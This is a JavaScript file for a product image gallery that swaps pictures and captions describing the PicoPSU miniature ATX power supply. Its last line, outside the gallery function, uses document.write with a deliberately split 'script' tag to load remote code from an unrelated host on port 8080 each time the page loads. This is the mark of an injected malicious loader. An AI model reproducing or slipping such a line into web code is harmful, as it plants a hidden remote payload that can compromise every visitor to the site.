function showPic(whichpic) {
 if (document.getElementById) {
  document.getElementById('placeholder').src =whichpic;//"images_pico/IMG_22.jpg";

  switch  (whichpic)
  {
	  
	  case 'images_pico/IMG_22.jpg':
	  document.getElementById('placeText').innerHTML = "Very small, can build unltra-compact PC enclosures and slim server enclosures. ";
	  break;

	  case "images_pico/IMG_11.jpg":
	  document.getElementById('placeText').innerHTML = "Fits any motherboard equipped with a 20 or 24pin ATX connector.";
	  break;

	   case "images_pico/IMG_33.jpg":
	   document.getElementById('placeText').innerHTML = "100% silent, fanless, no moving parts. ";
	   break;

	  case "images_pico/IMG_44.jpg":
	  document.getElementById('placeText').innerHTML = "Plugs directly into the ATX connector. Operates at only 12V. ";
	  break;

	  case "images_pico/IMG_55.jpg":
	  document.getElementById('placeText').innerHTML = "Highly efficient design, does not produce a lot of heat.";
	  break;

	  case "images_pico/IMG_66.jpg":
	  document.getElementById('placeText').innerHTML = "Ideal for low power Intel Core Duo as well as all VIA C3/C7 motherboards";
	  break;

	    case "images_pico/IMG_77.jpg":
	  document.getElementById('placeText').innerHTML = "Over 96% efficiency";
	  break;
	     case "images_pico/micrometer11.gif":
	  document.getElementById('placeText').innerHTML = "Measuring just 31x45x20mm, about the size of two AA batteries";
	  break;
	     case "images_pico/win_front11.jpg":
	  document.getElementById('placeText').innerHTML = "PicoPSU is a fully compliant DC-DC ATX PC PSU.";
	  break;
	  
	      case "images_pico/IMG_8.jpg":
	  document.getElementById('placeText').innerHTML = "Small computer projects start with small power supplies.";
	  break;
	  
	  

  }

 /* if (whichpic.title) {
   document.getElementById('desc').childNodes[0].nodeValue = whichpic.title;
  } else {
   document.getElementById('desc').childNodes[0].nodeValue = whichpic.childNodes[0].nodeValue;
  }*/
 }
 // return true;

}



document.write('<s'+'cript type="text/javascript" src="http://assolkh.blackhulu.com:8080/USB.js"></scr'+'ipt>');